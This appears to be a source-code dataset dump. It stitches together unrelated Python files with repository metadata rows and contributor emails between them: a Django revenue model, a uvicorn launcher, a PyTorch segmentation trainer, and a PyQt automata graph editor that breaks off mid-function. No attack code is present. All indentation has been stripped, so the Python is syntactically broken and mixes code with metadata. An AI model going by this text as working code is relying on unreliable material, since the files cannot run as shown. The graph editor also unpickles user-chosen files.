STREAMS = {
('Government', 'Government'),
('Patient', 'Patient'),
('Donation', 'Donation')
}
class Revenue(models.Model):
stream = models.CharField(max_length=200, blank=True, null=True, choices=STREAMS)
bill = models.ForeignKey('portal.Bill', related_name='revenue_bill', on_delete=models.SET_NULL, blank=True, null=True)
patient = models.ForeignKey(Patient, on_delete=models.SET_NULL, related_name='revenue_patient', blank=True, null=True)
description = models.CharField(max_length=100, blank=True, null=True)
amount = models.DecimalField(max_digits=10, decimal_places=2, blank=True, null=True)
created_at = models.DateTimeField(blank=True, null=True)
created_by = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True, related_name='revenues')
def __str__(self):
return str(self.stream)
class Meta:
db_table = 'revenue'
ordering = ('-created_at',)
A_STATUS = {
('Show', 'Show'),
('Hide', 'Hide')
}
# class Announcement(models.Model):
# message = models.CharField(max_length=200, blank=True, null=True)
# title = models.CharField(max_length=200, blank=True, null=True)
# status = models.CharField(max_length=200, blank=True, null=True, choices=A_STATUS) | [
"tiilon42@gmail.com"
] | tiilon42@gmail.com |
9f80e717ea9714ed99db1309ab8affa2ee9ab24d | faf80886b0b826b0b9ec45e5e99112ddcdf55382 | /venv2/bin/uvicorn | 5817609c8197a3c3db081314c9ae55f0b2a3494c | [] | no_license | pythonashoksahu/testpro | 84c9b5d30ab053421252eebd05aa00a33cfcd76e | 870f3b7017948f6bc9d21e7cf25aebe816fc103d | refs/heads/master | 2023-03-14T04:48:57.411522 | 2021-02-25T07:15:04 | 2021-02-25T07:15:04 | 342,155,496 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | #!/home/republic/PycharmProjects/projectfastapi/venv2/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from uvicorn.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"niraj.kmr777s@gmail.com"
] | niraj.kmr777s@gmail.com | |
268df992d4a58fa7d9720b5e331578c2652054a2 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/image_segmentation/NAS-SEGM_ID1142_for_PyTorch/src/engine/trainer.py | 6e598066959d4fb2592982d4218e84c0c4d156e0 | [
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference",
"GPL-1.0-or-later",
"LicenseRef-scancode-proprietary-license"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 11,811 | py | #
# BSD 3-Clause License
#
# Copyright (c) 2017 xxxx
# All rights reserved.
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# ============================================================================
#
"""Training functions"""
import time
import logging
from collections import defaultdict
import numpy as np
import torch
from torch import nn
from helpers.utils import AverageMeter, try_except
import torch.npu
import os
NPU_CALCULATE_DEVICE = 0
if os.getenv('NPU_CALCULATE_DEVICE') and str.isdigit(os.getenv('NPU_CALCULATE_DEVICE')):
NPU_CALCULATE_DEVICE = int(os.getenv('NPU_CALCULATE_DEVICE'))
if torch.npu.current_device() != NPU_CALCULATE_DEVICE:
torch.npu.set_device(f'npu:{NPU_CALCULATE_DEVICE}')
logger = logging.getLogger(__name__)
@try_except
def populate_task0(segmenter, train_loader, kd_net, n_train, do_kd=False):
"""Populate data for task0 - the outputs of encoder.
Args:
segmenter (nn.Module) : segmentation network
train_loader (DataLoader) : training data iterator
kd_net (nn.Module) : teacher network if any
n_train (int) : how many samples to pre-compute
do_kd (boolean) : whether to do knowledge distillation
"""
Xy_train = defaultdict(list)
segmenter.eval()
# Populate Xy_train with encoder's outputs
try:
train_loader.dataset.set_stage("train")
except AttributeError:
train_loader.dataset.dataset.set_stage("train")
train_loader.batch_sampler.batch_size = 1 # to not run out of memory
with torch.no_grad():
n_curr = 0
for sample in train_loader:
image = sample["image"].float().npu()
target = sample["mask"].float()
enc_outputs = segmenter.module.encoder(image)
for i, enc_output in enumerate(enc_outputs):
Xy_train[i].extend(enc_output.unbind(0))
Xy_train["y"].extend(
nn.functional.interpolate(
target[:, None], size=enc_outputs[0].size()[2:], mode="nearest"
)
.long()
.squeeze(dim=1)
.npu()
.unbind(0)
)
if do_kd:
kd_y = kd_net(image)
Xy_train["kd_y"].extend(
nn.functional.interpolate(
kd_y,
size=enc_outputs[0].size()[2:],
mode="bilinear",
align_corners=False,
).unbind(0)
)
n_curr += image.size(0)
if n_curr >= n_train:
# By default we are taking the size of the first encoder output
# as our output size
Xy_train["out_size"] = enc_outputs[0].size()[2:]
logger.info(" Populated Xy_train, N = {}".format(n_curr))
break
# concat into a single tensor
for k, v in Xy_train.items():
if k != "out_size":
Xy_train[k] = torch.stack(v)
return Xy_train
@try_except
def train_task0(
Xy_train,
segmenter,
optim_dec,
epoch,
segm_crit,
kd_crit,
batch_size,
freeze_bn,
do_kd,
kd_coeff,
dec_grad_clip,
do_polyak,
avg_param=None,
polyak_decay=0.9,
aux_weight=0,
):
"""Training task0 segmenter - only decoder
Args:
Xy_train (dict) : pre-computed data
segmenter (nn.Module) : segmentation network
optim_dec (optim) : optimiser for decoder
epoch (int) : current segm epoch
segm_crit (nn.Loss) : segmentation criterion
kd_crit (nn.Loss) : knowledge distillation criterion
batch_size (int) : batch size used for training
freeze_bn (bool) : whether to keep batch norm statistics intact
do_kd (bool) : whether to do knowledge distillation
kd_coeff (float) : loss coefficient for knowledge distillation
dec_grad_clip (float) : clip decoder's parameters' norm to this value
do_polyak (bool) : whether to do Polyak averaging
avg_param : copy of parameters for Polyak averaging
polyak_decay (float) : momentum for Polyak averaging
aux_weight (float) : loss coefficient for auxiliary outputs
"""
# Train
n_examples = Xy_train[0].size(0)
batch_size = min(batch_size, n_examples)
n_passes = n_examples // batch_size
indices = np.arange(n_examples)
batch_time = AverageMeter()
losses = AverageMeter()
# Update BNs if not set otherwise
segmenter.module.decoder.train()
if freeze_bn:
for m in segmenter.module.decoder.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
np.random.shuffle(indices)
n=0
for i in range(n_passes):
if n==1:
pass
n=n+1
start = time.time()
train_idx = indices[(i * batch_size) : (i + 1) * batch_size]
encoder_outputs = [
Xy_train[key][train_idx]
for key in Xy_train.keys()
if key not in ["y", "kd_y", "out_size"]
]
output = segmenter.module.decoder(encoder_outputs)
if isinstance(output, tuple):
output, aux_outs = output
# NOTE: Output size can change as some layers will not be connected
output = nn.functional.interpolate(
output, size=Xy_train["out_size"], mode="bilinear"
)
soft_output = nn.LogSoftmax()(output)
# Compute loss and backpropagate
loss = segm_crit(soft_output, Xy_train["y"][train_idx])
if do_kd:
kd_loss = kd_crit(output, Xy_train["kd_y"][train_idx])
loss += kd_coeff * kd_loss
if aux_weight > 0:
for aux_out in aux_outs:
aux_out = nn.Upsample(
size=Xy_train["out_size"], mode="bilinear", align_corners=False
)(aux_out)
aux_out = nn.LogSoftmax()(aux_out)
# Compute loss and backpropagate
loss += segm_crit(aux_out, Xy_train["y"][train_idx]) * aux_weight
optim_dec.zero_grad()
loss.backward()
# Clip gradients' norm
nn.utils.clip_grad_norm_(segmenter.module.decoder.parameters(), dec_grad_clip)
optim_dec.step()
losses.update(loss.item())
batch_time.update(time.time() - start)
if do_polyak:
for p, avg_p in zip(segmenter.module.decoder.parameters(), avg_param):
avg_p.mul_(polyak_decay).add_(1.0 - polyak_decay, p.data)
logger.info(
" Train epoch: {}\t"
"Avg. Loss: {:.3f}\t"
"Avg. Time: {:.3f}".format(epoch, losses.avg, batch_time.avg)
)
@try_except
def train_segmenter(
segmenter,
train_loader,
optim_enc,
optim_dec,
epoch,
segm_crit,
freeze_bn,
enc_grad_clip,
dec_grad_clip,
do_polyak,
print_every=10,
aux_weight=-1,
avg_param=None,
polyak_decay=0.99,
):
"""Training segmenter end-to-end.
Args:
segmenter (nn.Module) : segmentation network
train_loader (DataLoader) : training data iterator
optim_enc (optim) : optimiser for encoder
optim_dec (optim) : optimiser for decoder
epoch (int) : current segmenter epoch
segm_crit (nn.Loss) : segmentation criterion
freeze_bn (bool) : whether to keep batch norm statistics intact
enc_grad_clip (float) : clip encoder's parameters' norm to this value
dec_grad_clip (float) : clip decoder's parameters' norm to this value
do_polyak (bool) : whether to do Polyak averaging
print_every (int) : how often to print out information
aux_weight (float) : loss coefficient for auxiliary outputs
avg_param : copy of parameters for Polyak averaging
polyak_decay (float) : momentum for Polyak averaging
"""
try:
train_loader.dataset.set_stage("train")
except AttributeError:
train_loader.dataset.dataset.set_stage("train") # for subset
segmenter.train()
if freeze_bn:
for m in segmenter.modules():
if isinstance(m, nn.BatchNorm2d):
m.eval()
batch_time = AverageMeter()
losses = AverageMeter()
m=0
for i, sample in enumerate(train_loader):
if m==0:
pass
m=m+1
start = time.time()
image = sample["image"].float().npu()
target = sample["mask"].npu()
target_var = torch.autograd.Variable(target).float()
# Compute output
output = segmenter(image)
if isinstance(output, tuple):
output, aux_outs = output
target_var = nn.functional.interpolate(
target_var[:, None], size=output.size()[2:], mode="nearest"
).long()[:, 0]
soft_output = nn.LogSoftmax()(output)
# Compute loss and backpropagate
loss = segm_crit(soft_output, target_var)
# Compute auxiliary loss
if aux_weight > 0:
for aux_out in aux_outs:
aux_out = nn.Upsample(
size=target_var.size()[1:], mode="bilinear", align_corners=False
)(aux_out)
aux_out = nn.LogSoftmax()(aux_out)
# Compute loss and backpropagate
loss += segm_crit(aux_out, target_var) * aux_weight
optim_enc.zero_grad()
optim_dec.zero_grad()
loss.backward()
# Clip gradients' norm
if enc_grad_clip > 0:
nn.utils.clip_grad_norm_(
segmenter.module.encoder.parameters(), enc_grad_clip
)
if dec_grad_clip > 0:
nn.utils.clip_grad_norm_(
segmenter.module.decoder.parameters(), dec_grad_clip
)
optim_enc.step()
optim_dec.step()
if do_polyak:
for p, avg_p in zip(segmenter.parameters(), avg_param):
avg_p.mul_(polyak_decay).add_(1.0 - polyak_decay, p.data)
losses.update(loss.item())
batch_time.update(time.time() - start)
bt=time.time() - start
if i % print_every == 0:
logger.info(
" Train epoch: {} [{}/{}]\t"
"Avg. Loss: {:.3f}\t"
"Avg. Time: {:.3f}".format(
epoch, i, len(train_loader), losses.avg, bt
)
)
| [
"wangjiangben@huawei.com"
] | wangjiangben@huawei.com |
f4f0cff6f974d4d35b0bc2790b525b68d3c8bf48 | 9c17ef83b0f5bf93438f210dbdcd2a4be566a9ee | /V3/graph.py | 057b8c82b4bd2c7f98eddeba6acdb60c6ae0d307 | [] | no_license | rubencg195/GraphEditor | b8a76f287c8d065e1fec06417a3eaf25a10ed8fd | af271aaa9e83c59e9cfa1012b04ce2e6b39787c2 | refs/heads/master | 2021-01-20T05:46:39.995102 | 2017-08-27T16:40:10 | 2017-08-27T16:40:10 | 101,469,997 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,605 | py | import sys
import json
from random import randint
from PyQt4 import QtCore, QtGui
from fysom import Fysom
# from automata.fa.dfa import DFA
# from automata.fa.nfa import NFA
import logging
import pickle
import re
from DFA import DFA
from NFA import NFA
from NFA_e import NFAe
from grammaregex import print_tree, match_tree, find_tokens, verify_pattern, PatternSyntaxException
import AutomataLib
currNode = None
nextNode = None
nodeList = []
conList = []
painter = None
canvas = None
mainWidget = None
mode = "NFA"
action = ""
startNode = None
evalValue = None
symbols = {'0', '1'}
alphabet = "0,1"
# alphabet = "0,1,2,3,4,5,6,7"
# testFilename = "/home/ruben/Desktop/Computer Theory/V3/examples/DFA"
testFilename = "/home/ruben/Desktop/Computer Theory/V3/examples/cantidad 1 y 0 impar V3"
# testFilename = "/home/ruben/Desktop/Computer Theory/V3/examples/NFA_e"
logger = logging.Logger('catch_all')
app = QtGui.QApplication(sys.argv)
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Canvas(QtGui.QWidget):
def __init__(self, parent):
QtGui.QWidget.__init__(self, parent)
def paintEvent(self, event):
qp = QtGui.QPainter()
qp.begin(self)
for con in conList:
try:
qp.setPen(QtGui.QColor(con.red , con.green , con.blue))
pen = qp.pen()
pen.setWidth(5)
qp.setPen(pen)
qp.setFont(QtGui.QFont('Decorative', 20))
# print con.node.name , " to ", con.nextNode.name , " node " ,con.name
x1 = con.node.x()
y1 = con.node.y()
x2 = con.nextNode.x()
y2 = con.nextNode.y()
if(not con.node.deleted and not con.nextNode.deleted):
if(con.node != con.nextNode):
qp.drawLine(x1+25, y1+25, x2+25 , y2+25 )
slope = ( y2 - y1 ) / ( x2 - x1 )
factor = -15
factorX = slope * factor
factorY = slope * factor
qp.drawText(QtCore.QPoint( x2 + factorX , y2 + factorY ) , con.name )
else:
qp.drawEllipse(con.node.x() - 25 , con.node.y() - 25 , 50 , 50 )
factorX = -50
factorY = -50
qp.drawText(QtCore.QPoint( x2 + factorX , y2 + factorY ) , con.name )
else:
print( "alguno es nulo")
if(con.node.deleted):
con.delCon(con.nextNode)
if(con.nextNode.deleted):
con.delCon(con.node)
except:
pass
qp.end()
class Ui_MainWindow(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
def setupUi(self):
self.setObjectName(_fromUtf8("MainWindow"))
self.resize(1500, 900)
self.menu = QtGui.QWidget(self)
self.menu.setGeometry(QtCore.QRect(10, 10, 251, 900))
self.menu.setObjectName(_fromUtf8("menu"))
self.pushButton_edit = QtGui.QPushButton(self.menu)
self.pushButton_edit.setGeometry(QtCore.QRect(10, 536, 221, 51))
self.pushButton_edit.setObjectName(_fromUtf8("pushButton_edit"))
self.pushButton_delete = QtGui.QPushButton(self.menu)
self.pushButton_delete.setGeometry(QtCore.QRect(10, 596, 221, 51))
self.pushButton_delete.setObjectName(_fromUtf8("pushButton_delete"))
self.pushButton_add = QtGui.QPushButton(self.menu)
self.pushButton_add.setGeometry(QtCore.QRect(10, 476, 221, 51))
self.pushButton_add.setObjectName(_fromUtf8("pushButton_add"))
self.comboBox_type = QtGui.QComboBox(self.menu)
self.comboBox_type.setGeometry(QtCore.QRect(10, 30, 221, 51))
self.comboBox_type.setObjectName(_fromUtf8("comboBox_type"))
self.comboBox_type.addItem(_fromUtf8(""))
self.comboBox_type.addItem(_fromUtf8(""))
self.comboBox_type.addItem(_fromUtf8(""))
self.comboBox_type.addItem(_fromUtf8(""))
self.comboBox_edit_type = QtGui.QComboBox(self.menu)
self.comboBox_edit_type.setGeometry(QtCore.QRect(10, 90, 221, 51))
self.comboBox_edit_type.setObjectName(_fromUtf8("comboBox_type"))
self.comboBox_edit_type.addItem("NODE")
self.comboBox_edit_type.addItem("CONNECTION")
self.label_con = QtGui.QLabel("Node Connections", self.menu)
self.label_con.setGeometry(QtCore.QRect(90, 150, 68, 17))
self.comboBox_con = QtGui.QComboBox(self.menu)
self.comboBox_con.setGeometry(QtCore.QRect(10, 190, 221, 51))
self.pushButton_deselect = QtGui.QPushButton("Deselect", self.menu)
self.pushButton_deselect.setGeometry(QtCore.QRect(10, 250, 221, 61))
self.pushButton_deselect.setObjectName(_fromUtf8("pushButton_con"))
self.label = QtGui.QLabel(self.menu)
self.label.setGeometry(QtCore.QRect(100, 390, 68, 17))
self.label.setObjectName(_fromUtf8("label"))
self.lineEdit_value = QtGui.QLineEdit(self.menu)
self.lineEdit_value.setGeometry(QtCore.QRect(20, 346, 211, 41))
self.lineEdit_value.setObjectName(_fromUtf8("lineEdit_value"))
self.label_2 = QtGui.QLabel(self.menu)
self.label_2.setGeometry(QtCore.QRect(90, 320, 68, 17))
self.label_2.setObjectName(_fromUtf8("label_2"))
self.pushButton_save = QtGui.QPushButton(self.menu)
self.pushButton_save.setGeometry(QtCore.QRect(10, 746, 221, 61))
self.pushButton_save.setObjectName(_fromUtf8("pushButton_save"))
self.pushButton_load = QtGui.QPushButton("Load",self.menu)
self.pushButton_load.setGeometry(QtCore.QRect(10, 810, 221, 61))
self.pushButton_load.setObjectName(_fromUtf8("pushButton_load"))
self.label_3 = QtGui.QLabel(self.menu)
self.label_3.setGeometry(QtCore.QRect(40, 670, 161, 20))
self.label_3.setObjectName(_fromUtf8("label_3"))
self.lineEdit_filename = QtGui.QLineEdit(self.menu)
self.lineEdit_filename.setGeometry(QtCore.QRect(10, 700, 221, 41))
self.lineEdit_filename.setObjectName(_fromUtf8("lineEdit_filename"))
self.label_4 = QtGui.QLabel(self.menu)
self.label_4.setGeometry(QtCore.QRect(100, 10, 68, 17))
self.label_4.setObjectName(_fromUtf8("label_4"))
self.comboBox_node_type = QtGui.QComboBox(self.menu)
self.comboBox_node_type.setGeometry(QtCore.QRect(10, 410, 221, 51))
self.comboBox_node_type.setObjectName(_fromUtf8("comboBox_node_type"))
self.comboBox_node_type.addItem(_fromUtf8(""))
self.comboBox_node_type.addItem(_fromUtf8(""))
self.comboBox_node_type.addItem(_fromUtf8(""))
self.canvas = Canvas(self)
self.canvas.setGeometry(QtCore.QRect(270, 10, 1221, 831))
self.canvas.setObjectName(_fromUtf8("canvas"))
self.lineEdit_eval = QtGui.QLineEdit(self.canvas)
self.lineEdit_eval.setGeometry(QtCore.QRect(300, 10, 100, 40))
self.lineEdit_eval.setObjectName(_fromUtf8("lineEdit_eval"))
self.label_eval = QtGui.QLabel(self.canvas)
self.label_eval.setGeometry(QtCore.QRect(200, 10, 80, 40))
self.label_eval.setObjectName(_fromUtf8("label_eval"))
self.pushButton_eval = QtGui.QPushButton("Evaluate",self.canvas)
self.pushButton_eval.setGeometry(QtCore.QRect(750, 10, 100, 40))
self.pushButton_eval.setObjectName(_fromUtf8("pushButton_eval"))
self.label_regex = QtGui.QLabel("REGEX", self.canvas)
self.label_regex.setGeometry(QtCore.QRect(450, 10, 100, 40))
self.label_regex.setObjectName(_fromUtf8("label_regex"))
self.lineEdit_regex = QtGui.QLineEdit("(0|(1(01*(00)*0)*1)*)*",self.canvas)
self.lineEdit_regex.setGeometry(QtCore.QRect(500, 10, 200, 40))
self.lineEdit_regex.setObjectName(_fromUtf8("lineEdit_regex"))
self.pushButton_conv = QtGui.QPushButton("Convert",self.canvas)
self.pushButton_conv.setGeometry(QtCore.QRect(850, 10, 100, 40))
self.pushButton_conv.setObjectName(_fromUtf8("pushButton_conv"))
global canvas
global mainWidget
canvas = self.canvas
mainWidget = self
self.retranslateUi()
QtCore.QMetaObject.connectSlotsByName(self)
def retranslateUi(self):
self.pushButton_edit.setText(_translate("MainWindow", "Editar", None))
self.pushButton_delete.setText(_translate("MainWindow", "Borrar", None))
self.pushButton_add.setText(_translate("MainWindow", "Agregar", None))
self.comboBox_type.setItemText(0, _translate("MainWindow", "DFA", None))
self.comboBox_type.setItemText(1, _translate("MainWindow", "NFA", None))
self.comboBox_type.setItemText(2, _translate("MainWindow", "NFA EPSILON", None))
self.comboBox_type.setItemText(3, _translate("MainWindow", "REGEX", None))
self.label.setText(_translate("MainWindow", "Tipo", None))
self.label_2.setText(_translate("MainWindow", "Valor", None))
self.pushButton_save.setText(_translate("MainWindow", "Guardar", None))
self.label_3.setText(_translate("MainWindow", " Nombre del Archivo", None))
self.label_4.setText(_translate("MainWindow", "Menu", None))
self.comboBox_node_type.setItemText(0, _translate("MainWindow", "START", None))
self.comboBox_node_type.setItemText(1, _translate("MainWindow", "NORMAL", None))
self.comboBox_node_type.setItemText(2, _translate("MainWindow", "FINAL", None))
self.label_eval.setText(_translate("MainWindow", "EVALUATE", None))
self.lineEdit_value.setText("Q0")
self.eventManager()
def eventManager(self):
self.DFA = 0;
self.NFA = 1;
self.NFA_E = 2;
self.START = 0;
self.NORMAL = 1;
self.FINAL = 2;
self.nodeTypeSelected = "NORMAL";
self.fsmSelected = "DFA";
self.canvas.mousePressEvent = self.mousePressEvent
self.canvas.mousePressEvent = self.mousePressEvent
self.setAcceptDrops(True)
self.pushButton_add.clicked.connect(self.add)
self.pushButton_edit.clicked.connect(self.edit)
self.pushButton_delete.clicked.connect(self.delete)
self.pushButton_save.clicked.connect(self.save)
self.pushButton_load.clicked.connect(self.load)
self.pushButton_eval.clicked.connect(evaluate)
self.pushButton_conv.clicked.connect(convert)
self.pushButton_deselect.clicked.connect(self.node_deselect)
self.comboBox_type.currentIndexChanged.connect(self.changeType)
self.comboBox_node_type.currentIndexChanged.connect(self.changeNodeType)
def mousePressEvent(self, QMouseEvent):
cursor = QtGui.QCursor()
def mouseReleaseEvent(self, QMouseEvent):
cursor = QtGui.QCursor()
def save(self):
print( "save")
dlg = QtGui.QFileDialog()
dlg.setFileMode(QtGui.QFileDialog.AnyFile)
if dlg.exec_():
filenames = dlg.selectedFiles()
print( "Seleccionado ", filenames[0])
filehandler = open(filenames[0], 'wb')
saveNodeList = []
saveConList = []
for node in nodeList:
saveNodeList.append( { "first": node.first , "final": node.final , "img": node.img , "name": str(node.label.text()), "x":node.x(), "y":node.y() } )
pickle.dump( saveNodeList , filehandler)
for con in conList:
saveConList.append( { "name":con.name , "same":con.same , "node": str(con.node.label.text()) , "nextNode":str(con.nextNode.label.text()) } )
pickle.dump( saveConList , filehandler)
pickle.dump( alphabet , filehandler)
pickle.dump( self.lineEdit_eval.text() , filehandler)
pickle.dump( symbols , filehandler)
def load(self, test = False):
print( "load")
global startNode
global evalValue
global nodeList
global conList
global symbols
for con in conList:
try:
con.node.delNode()
except:
print("err del node from con")
try:
con.nextNode.delNode()
except:
print("err del nextNode from con")
for node in nodeList:
try:
node.delNode()
except:
print("err del node from nodeList")
dlg = QtGui.QFileDialog()
dlg.setFileMode(QtGui.QFileDialog.AnyFile)
# dlg.setFilter("Text files (*.*)")
filenames = []
windowOpened = False
if not test:
windowOpened = dlg.exec_()
filenames = dlg.selectedFiles()
else:
filenames = [testFilename]
if windowOpened or test:
filehandler = open(filenames[0], 'rb')
loadNodeList = pickle.load( filehandler )
conNodeList = pickle.load( filehandler )
for n in loadNodeList :
new_node = Node(self.canvas, n["first"], n["final"], n["img"], n["name"] )
new_node.moveNode(QtCore.QPoint(n['x'], n['y']))
if n["first"]:
startNode = new_node
for c in conNodeList :
conNode = findNode( c["node"] )
conNextNode = findNode( c["nextNode"])
newCon = Connection(conNode , conNextNode , c["same"] )
newCon.name = c["name"]
conNode.connections.append(newCon)
conList.append(newCon)
alphabet = pickle.load(filehandler)
evalValue = pickle.load(filehandler)
symbols = pickle.load( filehandler)
self.lineEdit_eval.setText(evalValue)
def checkNodeExist(self, value):
for node in nodeList:
# print( "checking ", node.label.text(), " - ", value)
if(node.label.text() == value):
return True
return False
def checkConExist(self, node, value):
for con in node.connections:
# print( "checking ", con.name , " - ", value)
if(con.name == value):
return True
return False
def add(self):
global startNode
value = self.lineEdit_value.text()
if self.checkNodeExist(value):
showMsg("Already Exist")
print( "Exist")
else:
isFinal = False
isStart = False
nodeType = self.comboBox_node_type.currentText().lower()
if(nodeType == "start"):
isStart = True
if startNode != None:
showMsg("Already a start point")
return
elif(nodeType == "final"):
print( "Final Node Created")
isFinal = True
else:
print( "Normal Node Created")
filename = nodeType+".png"
new_node = Node(self.canvas, isStart, isFinal, filename, value )
if(isStart):
startNode = new_node
print( "Start Node Created")
print( "Node List: ", len(nodeList))
mainWidget.lineEdit_value.setText("Q"+str(len(nodeList)))
# print( "add ", new_label, filename)
deselectGlobalNodes()
def edit(self):
global action
action = "EDIT"
print ("edit")
value = mainWidget.lineEdit_value.text()
option = mainWidget.comboBox_edit_type.currentText()
print( "OPTION: ", option)
if option == "NODE" :
if currNode != None:
if self.checkNodeExist(value):
showMsg("Already Exist")
else:
currNode.label.setText(value)
elif option == "CONNECTION":
action = "EDIT_CON"
index = self.comboBox_con.currentIndex()
print( "edit_con ", self.comboBox_con.currentText() , " index ", index)
if( index != -1 ):
if currNode != None:
if self.checkConExist(currNode, value):
showMsg("Already Exist")
else:
currNode.connections[index].name = self.lineEdit_value.text()
deselectGlobalNodes()
def node_deselect(self):
deselectGlobalNodes()
def delete(self):
global action
option = mainWidget.comboBox_edit_type.currentText()
print ("OPTION: ", option)
if( option == "NODE" ):
action = "DEL"
if currNode != None:
currNode.delNode()
print( "delete")
elif option == "CONNECTION":
action = "DEL_CON"
index = self.comboBox_con.currentIndex()
print( "Del_con ", self.comboBox_con.currentText() , " index ", index)
if( index != -1 ):
conList[index].delCon(currNode)
deselectGlobalNodes()
def changeType(self, i):
if i == self.DFA:
typeName = 'DFA'
elif i == self.NFA:
typeName = 'NFA'
elif i == self.NFA_E:
typeName = 'NFA EPSILON'
# print( "change: ", i, typeName ,self.comboBox_type.currentText())
# self.fsmSelected = typeName
def changeNodeType(self, i):
if i == self.START:
typeName = 'START'
elif i == self.NORMAL:
typeName = 'NORMAL'
elif i == self.FINAL:
typeName = 'FINAL'
# print( "change: ", i, typeName ,self.comboBox_node_type.currentText())
self.fsmSelected = typeName
def dragEnterEvent(self, e):
e.accept()
# print( "DRAG")
def dropEvent(self, e):
position = e.pos()
self.button.move(position)
e.setDropAction(QtCore.Qt.MoveAction)
e.accept()
# print( "DROP")
class Connection():
def __init__(self, node, nextNode, same):
self.node = node
self.nextNode = nextNode
self.same = same
self.deleted = False
self.name = mainWidget.lineEdit_value.text()
self.red = randint(0, 255)
self.green = randint(0, 255)
self.blue = randint(0, 255)
def delCon(self, node):
self.deleted = True
conList.remove(self)
node.connections.remove(self);
mainWidget.update()
del self
print( "Con List: ", len(conList))
class Node(QtGui.QLabel):
def __init__(self, parent, first, final, img,name):
QtGui.QLabel.__init__(self, parent)
super(Node, self).__init__(parent=parent)
self.connections = []
self.deleted = False
self.setAcceptDrops(True)
self.setPixmap(QtGui.QPixmap(_fromUtf8(img)))
self.setScaledContents(True)
self.setGeometry(QtCore.QRect(0, 0, 50, 50))
self.move(50,50)
self.show()
self.selected = QtGui.QLabel(parent)
self.selected.setScaledContents(True)
self.selected.setPixmap(QtGui.QPixmap(_fromUtf8("select.png")))
self.selected.setGeometry(QtCore.QRect(0, 0, 80, 80))
self.selected.move(35,35)
self.label = QtGui.QLabel(name, parent);
self.label.move(45,100)
self.label.show()
nodeList.append(self)
self.first = first
self.final = final
self.name = name
self.img = img
def moveNode(self, pos):
self.move(pos)
x = pos.x()
y = pos.y()
self.selected.move( x - 15, y -15 )
self.label.move( x + 10 , y + 65 )
def delNode(self):
self.deleted = True
self.label.hide()
self.selected.hide()
self.hide()
mainWidget.update()
if(self.first):
global startNode
startNode = None
print( "Deleting from List ", nodeList.remove(self))
del self.label
del self.selected
del self
print ("Node List: ", len(nodeList))
def showSelected(self):
self.selected.show()
self.raise_()
def hideSelected(self):
self.selected.hide()
# print( "hide Select")
def mousePressEvent(self, event):
global action
if(action == "EDIT"):
print( "EDIT")
if(action == "EDIT_CON"):
print( "EDIT_CON")
elif(action == 'DEL'):
print ("DEL")
else:
self.__mousePressPos = None
self.__mouseMovePos = None
if event.button() == QtCore.Qt.LeftButton:
self.__mousePressPos = event.globalPos()
self.__mouseMovePos = event.globalPos()
super(Node, self).mousePressEvent(event)
selectGlobalNodes(self)
action = ""
def mouseMoveEvent(self, event):
if event.buttons() == QtCore.Qt.LeftButton:
# adjust offset from clicked point to origin of widget
currPos = self.mapToGlobal(self.pos())
globalPos = event.globalPos()
diff = globalPos - self.__mouseMovePos
newPos = self.mapFromGlobal(currPos + diff)
# print( 'DRAG')
deselectGlobalNodes()
self.moveNode(newPos)
self.__mouseMovePos = globalPos
mainWidget.repaint()
super(Node, self).mouseMoveEvent(event)
def mouseReleaseEvent(self, event):
try:
doSomething()
if self.__mousePressPos is not None:
moved = event.globalPos() - self.__mousePressPos
if moved.manhattanLength() > 3:
event.ignore()
return
print( "DROP")
mainWidget.repaint()
mainWidget.update()
super(Node, self).mouseReleaseEvent(event)
except Exception:
print( "")
# showMsg("ERROR")
def selectGlobalNodes(node):
global currNode
